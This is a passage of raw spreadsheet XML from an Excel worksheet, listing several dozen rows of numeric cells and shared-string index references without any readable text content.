      <c r="C24191" s="2" t="s">
        <v>23301</v>
      </c>
      <c r="D24191" s="2">
        <v>1.0</v>
      </c>
      <c r="E24191" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24191" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24192" ht="15.75" customHeight="1">
      <c r="A24192" s="1">
        <v>1575.0</v>
      </c>
      <c r="B24192" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C24192" s="2" t="s">
        <v>23302</v>
      </c>
      <c r="D24192" s="2">
        <v>1.0</v>
      </c>
      <c r="E24192" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24192" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24193" ht="15.75" customHeight="1">
      <c r="A24193" s="1">
        <v>1942.0</v>
      </c>
      <c r="B24193" s="2">
        <v>3.0209741E7</v>
      </c>
      <c r="C24193" s="2" t="s">
        <v>23303</v>
      </c>
      <c r="D24193" s="2">
        <v>1.0</v>
      </c>
      <c r="E24193" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24193" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24194" ht="15.75" customHeight="1">
      <c r="A24194" s="1">
        <v>3906.0</v>
      </c>
      <c r="B24194" s="2">
        <v>4.0482808E7</v>
      </c>
      <c r="C24194" s="2" t="s">
        <v>23304</v>
      </c>
      <c r="D24194" s="2">
        <v>1.0</v>
      </c>
      <c r="E24194" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24194" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24195" ht="15.75" customHeight="1">
      <c r="A24195" s="1">
        <v>3953.0</v>
      </c>
      <c r="B24195" s="2">
        <v>4.0674107E7</v>
      </c>
      <c r="C24195" s="2" t="s">
        <v>23305</v>
      </c>
      <c r="D24195" s="2">
        <v>1.0</v>
      </c>
      <c r="E24195" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24195" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24196" ht="15.75" customHeight="1">
      <c r="A24196" s="1">
        <v>4682.0</v>
      </c>
      <c r="B24196" s="2">
        <v>4.3199059E7</v>
      </c>
      <c r="C24196" s="2" t="s">
        <v>23306</v>
      </c>
      <c r="D24196" s="2">
        <v>1.0</v>
      </c>
      <c r="E24196" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24196" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24197" ht="15.75" customHeight="1">
      <c r="A24197" s="1">
        <v>4981.0</v>
      </c>
      <c r="B24197" s="2">
        <v>4.4122688E7</v>
      </c>
      <c r="C24197" s="2" t="s">
        <v>23307</v>
      </c>
      <c r="D24197" s="2">
        <v>1.0</v>
      </c>
      <c r="E24197" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24197" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24198" ht="15.75" customHeight="1">
      <c r="A24198" s="1">
        <v>5103.0</v>
      </c>
      <c r="B24198" s="2">
        <v>4.4523405E7</v>
      </c>
      <c r="C24198" s="2" t="s">
        <v>23308</v>
      </c>
      <c r="D24198" s="2">
        <v>1.0</v>
      </c>
      <c r="E24198" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24198" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24199" ht="15.75" customHeight="1">
      <c r="A24199" s="1">
        <v>5489.0</v>
      </c>
      <c r="B24199" s="2">
        <v>4.5774274E7</v>
      </c>
      <c r="C24199" s="2" t="s">
        <v>23309</v>
      </c>
      <c r="D24199" s="2">
        <v>1.0</v>
      </c>
      <c r="E24199" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24199" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24200" ht="15.75" customHeight="1">
      <c r="A24200" s="1">
        <v>5711.0</v>
      </c>
      <c r="B24200" s="2">
        <v>4.6553483E7</v>
      </c>
      <c r="C24200" s="2" t="s">
        <v>23310</v>
      </c>
      <c r="D24200" s="2">
        <v>1.0</v>
      </c>
      <c r="E24200" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24200" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24201" ht="15.75" customHeight="1">
      <c r="A24201" s="1">
        <v>8841.0</v>
      </c>
      <c r="B24201" s="2">
        <v>5.4692171E7</v>
      </c>
      <c r="C24201" s="2" t="s">
        <v>23311</v>
      </c>
      <c r="D24201" s="2">
        <v>1.0</v>
      </c>
      <c r="E24201" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24201" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24202" ht="15.75" customHeight="1">
      <c r="A24202" s="1">
        <v>9872.0</v>
      </c>
      <c r="B24202" s="2">
        <v>5.6729127E7</v>
      </c>
      <c r="C24202" s="2" t="s">
        <v>23312</v>
      </c>
      <c r="D24202" s="2">
        <v>1.0</v>
      </c>
      <c r="E24202" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24202" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24203" ht="15.75" customHeight="1">
      <c r="A24203" s="1">
        <v>10514.0</v>
      </c>
      <c r="B24203" s="2">
        <v>1.1768814E7</v>
      </c>
      <c r="C24203" s="2" t="s">
        <v>23313</v>
      </c>
      <c r="D24203" s="2">
        <v>1.0</v>
      </c>
      <c r="E24203" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24203" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24204" ht="15.75" customHeight="1">
      <c r="A24204" s="1">
        <v>12652.0</v>
      </c>
      <c r="B24204" s="2">
        <v>3039819.0</v>
      </c>
      <c r="C24204" s="2" t="s">
        <v>23314</v>
      </c>
      <c r="D24204" s="2">
        <v>1.0</v>
      </c>
      <c r="E24204" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24204" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24205" ht="15.75" customHeight="1">
      <c r="A24205" s="1">
        <v>12859.0</v>
      </c>
      <c r="B24205" s="2">
        <v>3.1870637E7</v>
      </c>
      <c r="C24205" s="2" t="s">
        <v>23315</v>
      </c>
      <c r="D24205" s="2">
        <v>1.0</v>
      </c>
      <c r="E24205" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24205" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24206" ht="15.75" customHeight="1">
      <c r="A24206" s="1">
        <v>13875.0</v>
      </c>
      <c r="B24206" s="2">
        <v>3.6983726E7</v>
      </c>
      <c r="C24206" s="2" t="s">
        <v>23316</v>
      </c>
      <c r="D24206" s="2">
        <v>1.0</v>
      </c>
      <c r="E24206" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24206" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24207" ht="15.75" customHeight="1">
      <c r="A24207" s="1">
        <v>16108.0</v>
      </c>
      <c r="B24207" s="2">
        <v>4.5399501E7</v>
      </c>
      <c r="C24207" s="2" t="s">
        <v>23317</v>
      </c>
      <c r="D24207" s="2">
        <v>1.0</v>
      </c>
      <c r="E24207" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24207" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24208" ht="15.75" customHeight="1">
      <c r="A24208" s="1">
        <v>16237.0</v>
      </c>
      <c r="B24208" s="2">
        <v>4.5761572E7</v>
      </c>
      <c r="C24208" s="2" t="s">
        <v>23318</v>
      </c>
      <c r="D24208" s="2">
        <v>1.0</v>
      </c>
      <c r="E24208" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24208" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24209" ht="15.75" customHeight="1">
      <c r="A24209" s="1">
        <v>16244.0</v>
      </c>
      <c r="B24209" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C24209" s="2" t="s">
        <v>23319</v>
      </c>
      <c r="D24209" s="2">
        <v>1.0</v>
      </c>
      <c r="E24209" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24209" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24210" ht="15.75" customHeight="1">
      <c r="A24210" s="1">
        <v>16543.0</v>
      </c>
      <c r="B24210" s="2">
        <v>4.679326E7</v>
      </c>
      <c r="C24210" s="2" t="s">
        <v>23320</v>
      </c>
      <c r="D24210" s="2">
        <v>1.0</v>
      </c>
      <c r="E24210" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24210" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24211" ht="15.75" customHeight="1">
      <c r="A24211" s="1">
        <v>18883.0</v>
      </c>
      <c r="B24211" s="2">
        <v>5.4119375E7</v>
      </c>
      <c r="C24211" s="2" t="s">
        <v>23321</v>
      </c>
      <c r="D24211" s="2">
        <v>1.0</v>
      </c>
      <c r="E24211" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24211" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24212" ht="15.75" customHeight="1">
      <c r="A24212" s="1">
        <v>19224.0</v>
      </c>
      <c r="B24212" s="2">
        <v>5.5033764E7</v>
      </c>
      <c r="C24212" s="2" t="s">
        <v>23322</v>
      </c>
      <c r="D24212" s="2">
        <v>1.0</v>
      </c>
      <c r="E24212" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24212" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24213" ht="15.75" customHeight="1">
      <c r="A24213" s="1">
        <v>19842.0</v>
      </c>
      <c r="B24213" s="2">
        <v>5.7086198E7</v>
      </c>
      <c r="C24213" s="2" t="s">
        <v>23323</v>
      </c>
      <c r="D24213" s="2">
        <v>1.0</v>
      </c>
      <c r="E24213" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24213" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24214" ht="15.75" customHeight="1">
      <c r="A24214" s="1">
        <v>20336.0</v>
      </c>
      <c r="B24214" s="2">
        <v>1.1556137E7</v>
      </c>
      <c r="C24214" s="2" t="s">
        <v>23324</v>
      </c>
      <c r="D24214" s="2">
        <v>1.0</v>
      </c>
      <c r="E24214" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24214" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24215" ht="15.75" customHeight="1">
      <c r="A24215" s="1">
        <v>21059.0</v>
      </c>
      <c r="B24215" s="2">
        <v>1.7800515E7</v>
      </c>
      <c r="C24215" s="2" t="s">
        <v>23325</v>
      </c>
      <c r="D24215" s="2">
        <v>1.0</v>
      </c>
      <c r="E24215" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24215" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24216" ht="15.75" customHeight="1">
      <c r="A24216" s="1">
        <v>21169.0</v>
      </c>
      <c r="B24216" s="2">
        <v>1.9017861E7</v>
      </c>
      <c r="C24216" s="2" t="s">
        <v>23326</v>
      </c>
      <c r="D24216" s="2">
        <v>1.0</v>
      </c>
      <c r="E24216" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24216" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24217" ht="15.75" customHeight="1">
      <c r="A24217" s="1">
        <v>21266.0</v>
      </c>
      <c r="B24217" s="2">
        <v>2.0045877E7</v>
      </c>
      <c r="C24217" s="2" t="s">
        <v>23327</v>
      </c>
      <c r="D24217" s="2">
        <v>1.0</v>
      </c>
      <c r="E24217" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24217" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24218" ht="15.75" customHeight="1">
      <c r="A24218" s="1">
        <v>21453.0</v>
      </c>
      <c r="B24218" s="2">
        <v>2.2651642E7</v>
      </c>
      <c r="C24218" s="2" t="s">
        <v>23328</v>
      </c>
      <c r="D24218" s="2">
        <v>1.0</v>
      </c>
      <c r="E24218" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24218" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24219" ht="15.75" customHeight="1">
      <c r="A24219" s="1">
        <v>21692.0</v>
      </c>
      <c r="B24219" s="2">
        <v>2.5220705E7</v>
      </c>
      <c r="C24219" s="2" t="s">
        <v>23329</v>
      </c>
      <c r="D24219" s="2">
        <v>1.0</v>
      </c>
      <c r="E24219" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24219" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24220" ht="15.75" customHeight="1">
      <c r="A24220" s="1">
        <v>21706.0</v>
      </c>
      <c r="B24220" s="2">
        <v>2.5289285E7</v>
      </c>
      <c r="C24220" s="2" t="s">
        <v>23330</v>
      </c>
      <c r="D24220" s="2">
        <v>1.0</v>
      </c>
      <c r="E24220" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24220" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24221" ht="15.75" customHeight="1">
      <c r="A24221" s="1">
        <v>21787.0</v>
      </c>
      <c r="B24221" s="2">
        <v>2.6604343E7</v>
      </c>
      <c r="C24221" s="2" t="s">
        <v>23331</v>
      </c>
      <c r="D24221" s="2">
        <v>1.0</v>
      </c>
      <c r="E24221" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24221" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24222" ht="15.75" customHeight="1">
      <c r="A24222" s="1">
        <v>21914.0</v>
      </c>
      <c r="B24222" s="2">
        <v>2.8165921E7</v>
      </c>
      <c r="C24222" s="2" t="s">
        <v>23332</v>
      </c>
      <c r="D24222" s="2">
        <v>1.0</v>
      </c>
      <c r="E24222" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24222" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24223" ht="15.75" customHeight="1">
      <c r="A24223" s="1">
        <v>22009.0</v>
      </c>
      <c r="B24223" s="2">
        <v>2.9845476E7</v>
      </c>
      <c r="C24223" s="2" t="s">
        <v>23333</v>
      </c>
      <c r="D24223" s="2">
        <v>1.0</v>
      </c>
      <c r="E24223" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24223" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24224" ht="15.75" customHeight="1">
      <c r="A24224" s="1">
        <v>22486.0</v>
      </c>
      <c r="B24224" s="2">
        <v>3.7028953E7</v>
      </c>
      <c r="C24224" s="2" t="s">
        <v>23334</v>
      </c>
      <c r="D24224" s="2">
        <v>1.0</v>
      </c>
      <c r="E24224" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24224" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24225" ht="15.75" customHeight="1">
      <c r="A24225" s="1">
        <v>22941.0</v>
      </c>
      <c r="B24225" s="2">
        <v>4883632.0</v>
      </c>
      <c r="C24225" s="2" t="s">
        <v>23335</v>
      </c>
      <c r="D24225" s="2">
        <v>1.0</v>
      </c>
      <c r="E24225" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24225" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24226" ht="15.75" customHeight="1">
      <c r="A24226" s="1">
        <v>23603.0</v>
      </c>
      <c r="B24226" s="2">
        <v>6396182.0</v>
      </c>
      <c r="C24226" s="2" t="s">
        <v>23336</v>
      </c>
      <c r="D24226" s="2">
        <v>1.0</v>
      </c>
      <c r="E24226" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24226" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24227" ht="15.75" customHeight="1">
      <c r="A24227" s="1">
        <v>23611.0</v>
      </c>
      <c r="B24227" s="2">
        <v>6423394.0</v>
      </c>
      <c r="C24227" s="2" t="s">
        <v>23337</v>
      </c>
      <c r="D24227" s="2">
        <v>1.0</v>
      </c>
      <c r="E24227" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24227" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24228" ht="15.75" customHeight="1">
      <c r="A24228" s="1">
        <v>23670.0</v>
      </c>
      <c r="B24228" s="2">
        <v>6894550.0</v>
      </c>
      <c r="C24228" s="2" t="s">
        <v>23338</v>
      </c>
      <c r="D24228" s="2">
        <v>1.0</v>
      </c>
      <c r="E24228" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24228" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24229" ht="15.75" customHeight="1">
      <c r="A24229" s="1">
        <v>23791.0</v>
      </c>
      <c r="B24229" s="2">
        <v>7722518.0</v>
      </c>
      <c r="C24229" s="2" t="s">
        <v>23339</v>
      </c>
      <c r="D24229" s="2">
        <v>1.0</v>
      </c>
      <c r="E24229" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24229" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24230" ht="15.75" customHeight="1">
      <c r="A24230" s="1">
        <v>23882.0</v>
      </c>
      <c r="B24230" s="2">
        <v>8392102.0</v>
      </c>
      <c r="C24230" s="2" t="s">
        <v>23340</v>
      </c>
      <c r="D24230" s="2">
        <v>1.0</v>
      </c>
      <c r="E24230" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24230" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24231" ht="15.75" customHeight="1">
      <c r="A24231" s="1">
        <v>23911.0</v>
      </c>
      <c r="B24231" s="2">
        <v>8526118.0</v>
      </c>
      <c r="C24231" s="2" t="s">
        <v>23341</v>
      </c>
      <c r="D24231" s="2">
        <v>1.0</v>
      </c>
      <c r="E24231" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24231" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24232" ht="15.75" customHeight="1">
      <c r="A24232" s="1">
        <v>24034.0</v>
      </c>
      <c r="B24232" s="2">
        <v>9456522.0</v>
      </c>
      <c r="C24232" s="2" t="s">
        <v>23342</v>
      </c>
      <c r="D24232" s="2">
        <v>1.0</v>
      </c>
      <c r="E24232" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24232" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24233" ht="15.75" customHeight="1">
      <c r="A24233" s="1">
        <v>24114.0</v>
      </c>
      <c r="B24233" s="2">
        <v>9962169.0</v>
      </c>
      <c r="C24233" s="2" t="s">
        <v>23343</v>
      </c>
      <c r="D24233" s="2">
        <v>1.0</v>
      </c>
      <c r="E24233" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24233" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24234" ht="15.75" customHeight="1">
      <c r="A24234" s="1">
        <v>24255.0</v>
      </c>
      <c r="B24234" s="2">
        <v>1.0504958E7</v>
      </c>
      <c r="C24234" s="2" t="s">
        <v>23344</v>
      </c>
      <c r="D24234" s="2">
        <v>1.0</v>
      </c>
      <c r="E24234" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24234" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24235" ht="15.75" customHeight="1">
      <c r="A24235" s="1">
        <v>24557.0</v>
      </c>
      <c r="B24235" s="2">
        <v>1.1300358E7</v>
      </c>
      <c r="C24235" s="2" t="s">
        <v>23345</v>
      </c>
      <c r="D24235" s="2">
        <v>1.0</v>
      </c>
      <c r="E24235" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24235" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24236" ht="15.75" customHeight="1">
      <c r="A24236" s="1">
        <v>24640.0</v>
      </c>
      <c r="B24236" s="2">
        <v>1.1478973E7</v>
      </c>
      <c r="C24236" s="2" t="s">
        <v>23346</v>
      </c>
      <c r="D24236" s="2">
        <v>1.0</v>
      </c>
      <c r="E24236" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24236" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24237" ht="15.75" customHeight="1">
      <c r="A24237" s="1">
        <v>24747.0</v>
      </c>
      <c r="B24237" s="2">
        <v>1.1815341E7</v>
      </c>
      <c r="C24237" s="2" t="s">
        <v>23347</v>
      </c>
      <c r="D24237" s="2">
        <v>1.0</v>
      </c>
      <c r="E24237" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24237" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24238" ht="15.75" customHeight="1">
      <c r="A24238" s="1">
        <v>25319.0</v>
      </c>
      <c r="B24238" s="2">
        <v>1.3439676E7</v>
      </c>
      <c r="C24238" s="2" t="s">
        <v>23348</v>
      </c>
      <c r="D24238" s="2">
        <v>1.0</v>
      </c>
      <c r="E24238" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24238" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24239" ht="15.75" customHeight="1">
      <c r="A24239" s="1">
        <v>25702.0</v>
      </c>
      <c r="B24239" s="2">
        <v>1.4529979E7</v>
      </c>
      <c r="C24239" s="2" t="s">
        <v>23349</v>
      </c>
      <c r="D24239" s="2">
        <v>1.0</v>
      </c>
      <c r="E24239" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24239" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24240" ht="15.75" customHeight="1">
      <c r="A24240" s="1">
        <v>26035.0</v>
      </c>
      <c r="B24240" s="2">
        <v>1.5441799E7</v>
      </c>
      <c r="C24240" s="2" t="s">
        <v>23350</v>
      </c>
      <c r="D24240" s="2">
        <v>1.0</v>
      </c>
      <c r="E24240" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24240" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24241" ht="15.75" customHeight="1">
      <c r="A24241" s="1">
        <v>26197.0</v>
      </c>
      <c r="B24241" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C24241" s="2" t="s">
        <v>23351</v>
      </c>
      <c r="D24241" s="2">
        <v>1.0</v>
      </c>
      <c r="E24241" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24241" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24242" ht="15.75" customHeight="1">
      <c r="A24242" s="1">
        <v>26382.0</v>
      </c>
      <c r="B24242" s="2">
        <v>1.6990641E7</v>
      </c>
      <c r="C24242" s="2" t="s">
        <v>23352</v>
      </c>
      <c r="D24242" s="2">
        <v>1.0</v>
      </c>
      <c r="E24242" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24242" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24243" ht="15.75" customHeight="1">
      <c r="A24243" s="1">
        <v>27097.0</v>
      </c>
      <c r="B24243" s="2">
        <v>2.0544343E7</v>
      </c>
      <c r="C24243" s="2" t="s">
        <v>23353</v>
      </c>
      <c r="D24243" s="2">
        <v>1.0</v>
      </c>
      <c r="E24243" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24243" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24244" ht="15.75" customHeight="1">
      <c r="A24244" s="1">
        <v>27196.0</v>
      </c>
      <c r="B24244" s="2">
        <v>2.0921931E7</v>
      </c>
      <c r="C24244" s="2" t="s">
        <v>23354</v>
      </c>
      <c r="D24244" s="2">
        <v>1.0</v>
      </c>
      <c r="E24244" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24244" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24245" ht="15.75" customHeight="1">
      <c r="A24245" s="1">
        <v>27377.0</v>
      </c>
      <c r="B24245" s="2">
        <v>2.1708272E7</v>
      </c>
      <c r="C24245" s="2" t="s">
        <v>23355</v>
      </c>
      <c r="D24245" s="2">
        <v>1.0</v>
      </c>
      <c r="E24245" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24245" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24246" ht="15.75" customHeight="1">
      <c r="A24246" s="1">
        <v>27389.0</v>
      </c>
      <c r="B24246" s="2">
        <v>2.1763712E7</v>
      </c>
      <c r="C24246" s="2" t="s">
        <v>23356</v>
      </c>
      <c r="D24246" s="2">
        <v>1.0</v>
      </c>
      <c r="E24246" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24246" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24247" ht="15.75" customHeight="1">
      <c r="A24247" s="1">
        <v>27614.0</v>
      </c>
      <c r="B24247" s="2">
        <v>2.2651641E7</v>
      </c>
      <c r="C24247" s="2" t="s">
        <v>23328</v>
      </c>
      <c r="D24247" s="2">
        <v>1.0</v>
      </c>
      <c r="E24247" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24247" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24248" ht="15.75" customHeight="1">
      <c r="A24248" s="1">
        <v>27648.0</v>
      </c>
      <c r="B24248" s="2">
        <v>2.2802363E7</v>
      </c>
      <c r="C24248" s="2" t="s">
        <v>23357</v>
      </c>
      <c r="D24248" s="2">
        <v>1.0</v>
      </c>
      <c r="E24248" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24248" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24249" ht="15.75" customHeight="1">
      <c r="A24249" s="1">
        <v>27731.0</v>
      </c>
      <c r="B24249" s="2">
        <v>2.3080145E7</v>
      </c>
      <c r="C24249" s="2" t="s">
        <v>23358</v>
      </c>
      <c r="D24249" s="2">
        <v>1.0</v>
      </c>
      <c r="E24249" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24249" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24250" ht="15.75" customHeight="1">
      <c r="A24250" s="1">
        <v>27804.0</v>
      </c>
      <c r="B24250" s="2">
        <v>2.3236458E7</v>
      </c>
      <c r="C24250" s="2" t="s">
        <v>23359</v>
      </c>
      <c r="D24250" s="2">
        <v>1.0</v>
      </c>
      <c r="E24250" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24250" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24251" ht="15.75" customHeight="1">
      <c r="A24251" s="1">
        <v>27810.0</v>
      </c>
      <c r="B24251" s="2">
        <v>2.3303468E7</v>
      </c>
      <c r="C24251" s="2" t="s">
        <v>23360</v>
      </c>
      <c r="D24251" s="2">
        <v>1.0</v>
      </c>
      <c r="E24251" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24251" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24252" ht="15.75" customHeight="1">
      <c r="A24252" s="1">
        <v>28252.0</v>
      </c>
      <c r="B24252" s="2">
        <v>2.5289284E7</v>
      </c>
      <c r="C24252" s="2" t="s">
        <v>23330</v>
      </c>
      <c r="D24252" s="2">
        <v>1.0</v>
      </c>
      <c r="E24252" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24252" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24253" ht="15.75" customHeight="1">
      <c r="A24253" s="1">
        <v>28350.0</v>
      </c>
      <c r="B24253" s="2">
        <v>2.5956254E7</v>
      </c>
      <c r="C24253" s="2" t="s">
        <v>23361</v>
      </c>
      <c r="D24253" s="2">
        <v>1.0</v>
      </c>
      <c r="E24253" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24253" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24254" ht="15.75" customHeight="1">
      <c r="A24254" s="1">
        <v>28759.0</v>
      </c>
      <c r="B24254" s="2">
        <v>2.816592E7</v>
      </c>
      <c r="C24254" s="2" t="s">
        <v>23332</v>
      </c>
      <c r="D24254" s="2">
        <v>1.0</v>
      </c>
      <c r="E24254" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24254" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24255" ht="15.75" customHeight="1">
      <c r="A24255" s="1">
        <v>28963.0</v>
      </c>
      <c r="B24255" s="2">
        <v>2.9811661E7</v>
      </c>
      <c r="C24255" s="2" t="s">
        <v>23362</v>
      </c>
      <c r="D24255" s="2">
        <v>1.0</v>
      </c>
      <c r="E24255" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24255" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24256" ht="15.75" customHeight="1">
      <c r="A24256" s="1">
        <v>28987.0</v>
      </c>
      <c r="B24256" s="2">
        <v>2.9845475E7</v>
      </c>
      <c r="C24256" s="2" t="s">
        <v>23333</v>
      </c>
      <c r="D24256" s="2">
        <v>1.0</v>
      </c>
      <c r="E24256" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24256" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24257" ht="15.75" customHeight="1">
      <c r="A24257" s="1">
        <v>29243.0</v>
      </c>
      <c r="B24257" s="2">
        <v>3.0844182E7</v>
      </c>
      <c r="C24257" s="2" t="s">
        <v>23363</v>
      </c>
      <c r="D24257" s="2">
        <v>1.0</v>
      </c>
      <c r="E24257" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24257" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24258" ht="15.75" customHeight="1">
      <c r="A24258" s="1">
        <v>29287.0</v>
      </c>
      <c r="B24258" s="2">
        <v>3.1076028E7</v>
      </c>
